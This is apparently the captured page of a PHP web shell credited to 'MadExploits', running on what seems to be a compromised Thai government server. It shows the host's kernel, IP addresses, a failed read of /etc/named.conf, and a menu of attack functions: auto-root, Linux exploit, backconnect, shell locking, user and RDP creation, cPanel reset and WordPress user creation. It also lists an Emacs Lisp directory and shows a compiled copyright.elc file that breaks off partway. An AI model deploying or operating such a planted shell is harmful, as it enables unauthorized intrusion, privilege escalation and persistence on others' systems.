Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
emacs-lisp /
[ HOME SHELL ]
Name
Size
Permission
Action
advice.elc
60.71
KB
-rw-r--r--
assoc.elc
4.37
KB
-rw-r--r--
authors.elc
27.41
KB
-rw-r--r--
autoload.elc
15.7
KB
-rw-r--r--
avl-tree.elc
15.92
KB
-rw-r--r--
backquote.elc
4.46
KB
-rw-r--r--
benchmark.elc
3.33
KB
-rw-r--r--
bindat.elc
10.84
KB
-rw-r--r--
byte-opt.elc
34.22
KB
-rw-r--r--
byte-run.elc
6.65
KB
-rw-r--r--
bytecomp.elc
124.99
KB
-rw-r--r--
check-declare.elc
8.77
KB
-rw-r--r--
checkdoc.elc
65.08
KB
-rw-r--r--
cl-compat.elc
4.28
KB
-rw-r--r--
cl-extra.elc
21.48
KB
-rw-r--r--
cl-indent.elc
13.98
KB
-rw-r--r--
cl-loaddefs.el
39.57
KB
-rw-r--r--
cl-macs.elc
99.36
KB
-rw-r--r--
cl-seq.elc
43.98
KB
-rw-r--r--
cl-specs.el
13.87
KB
-rw-r--r--
cl.elc
20.74
KB
-rw-r--r--
copyright.elc
8.64
KB
-rw-r--r--
crm.elc
7.94
KB
-rw-r--r--
cust-print.elc
12.77
KB
-rw-r--r--
debug.elc
24.86
KB
-rw-r--r--
derived.elc
10.72
KB
-rw-r--r--
disass.elc
5.09
KB
-rw-r--r--
easy-mmode.elc
14.85
KB
-rw-r--r--
easymenu.elc
20.15
KB
-rw-r--r--
edebug.elc
100.82
KB
-rw-r--r--
eldoc.elc
15.31
KB
-rw-r--r--
elint.elc
19.76
KB
-rw-r--r--
elp.elc
12.78
KB
-rw-r--r--
ewoc.elc
28.62
KB
-rw-r--r--
find-func.elc
17.26
KB
-rw-r--r--
find-gc.elc
3.74
KB
-rw-r--r--
float-sup.elc
1.39
KB
-rw-r--r--
generic.elc
6.55
KB
-rw-r--r--
gulp.elc
4.82
KB
-rw-r--r--
helper.elc
3.84
KB
-rw-r--r--
levents.elc
10.29
KB
-rw-r--r--
lisp-mnt.elc
21.87
KB
-rw-r--r--
lisp-mode.elc
37.14
KB
-rw-r--r--
lisp.elc
21.61
KB
-rw-r--r--
lmenu.elc
11.67
KB
-rw-r--r--
lucid.elc
6.22
KB
-rw-r--r--
macroexp.elc
4.45
KB
-rw-r--r--
map-ynp.elc
6.3
KB
-rw-r--r--
pp.elc
5.09
KB
-rw-r--r--
re-builder.elc
22.36
KB
-rw-r--r--
regexp-opt.elc
4.43
KB
-rw-r--r--
regi.elc
6.15
KB
-rw-r--r--
ring.elc
6.41
KB
-rw-r--r--
rx.elc
26.61
KB
-rw-r--r--
shadow.elc
5.63
KB
-rw-r--r--
sregex.elc
12.45
KB
-rw-r--r--
syntax.elc
5.18
KB
-rw-r--r--
tcover-ses.elc
14.68
KB
-rw-r--r--
tcover-unsafep.elc
4.09
KB
-rw-r--r--
testcover.elc
13.41
KB
-rw-r--r--
timer.elc
22.73
KB
-rw-r--r--
tq.elc
3.94
KB
-rw-r--r--
trace.elc
5.28
KB
-rw-r--r--
unsafep.elc
5.01
KB
-rw-r--r--
warnings.elc
9.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : copyright.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:02:54 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/emacs-lisp/copyright.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file contains utf-8 non-ASCII characters ;;; and therefore cannot be loaded into Emacs 21 or earlier. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "23"))) (error "`copyright.el' was compiled for Emacs 23 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (custom-declare-group 'copyright nil "Update the copyright notice in current buffer." :group 'tools) #@117 Don't try to update copyright beyond this position unless interactive. A value of nil means to search whole buffer. (custom-declare-variable 'copyright-limit '2000 '(#$ . 722) :group 'copyright :type '(choice (integer :tag "Limit") (const :tag "No limit"))) #@108 Non-nil means to search backwards from the end of the buffer for copyright. This is useful for ChangeLogs. (custom-declare-variable 'copyright-at-end-flag 'nil '(#$ . 987) :group 'copyright :type 'boolean :version "23.1") #@89 What your copyright notice looks like. The second \( \) construct must match the years. (custom-declare-variable 'copyright-regexp '"\\(©\\|@copyright{}\\|[Cc]opyright\\s *:?\\s *\\(?:(C)\\)?\\|[Cc]opyright\\s *:?\\s *©\\)\\s *\\(?:[^0-9\n]*\\s *\\)?\\([1-9]\\([-0-9, ';/*%#\n ]\\|\\s<\\|\\s>\\)*[0-9]+\\)" '(#$ . 1215) :group 'copyright :type 'regexp) #@257 Regexp matching the names which correspond to the user. Only copyright lines where the name matches this regexp will be updated. This allows you to avoid adding years to a copyright notice belonging to someone else or to a group for which you do not work. (custom-declare-variable 'copyright-names-regexp '"" '(#$ . 1577) :group 'copyright :type 'regexp) #@91 Match additional copyright notice years. The second \( \) construct must match the years. (custom-declare-variable 'copyright-years-regexp '"\\(\\s *\\)\\([1-9]\\([-0-9, ';/*%#\n ]\\|\\s<\\|\\s>\\)*[0-9]+\\)" '(#$ . 1938) :group 'copyright :type 'regexp) #@114 If non-nil, ask user before changing copyright. When this is `function', only ask when called non-interactively. (custom-declare-variable 'copyright-query ''function '(#$ . 2200) :group 'copyright :type '(choice (const :tag "Do not ask") (const :tag "Ask unless interactive" function) (other :tag "Ask" t))) #@60 String representing the current version of the GPL or nil. (defconst copyright-current-gpl-version "3" (#$ . 2514)) #@75 The function `copyright-update' sets this to nil after updating a buffer. (defvar copyright-update t (#$ . 2636)) #@39 String representing the current year. (defvar copyright-current-year (byte-code "\300 \301\302O\207" [current-time-string -4 nil] 3) (#$ . 2756)) (defalias 'copyright-limit #[nil "\205 \203\f `Z\207`\\\207" [copyright-limit copyright-at-end-flag] 2]) (put 'copyright-limit 'byte-optimizer 'byte-compile-inline-expand) #@69 Re-search forward or backward depending on `copyright-at-end-flag'. (defalias 'copyright-re-search #[(regexp &optional bound noerror count) "\203 \305 \n\f$\207\306 \n\f$\207" [copyright-at-end-flag regexp bound noerror count re-search-backward re-search-forward] 5 (#$ . 3085)]) #@70 Return point-min or point-max, depending on `copyright-at-end-flag'. (defalias 'copyright-start-point #[nil "\203 d\207e\207" [copyright-at-end-flag] 1 (#$ . 3375)]) #@65 Return non-nil if point is too far from the edge of the buffer. (defalias 'copyright-offset-too-large-p #[nil "\205 \203 `dZW\207`e\\V\207" [copyright-limit copyright-at-end-flag] 3 (#$ . 3549)]) (defalias 'copyright-update-year #[(replace noquery) "\306\307\310\217\205\366 \311\225b\210\212g\312=\205>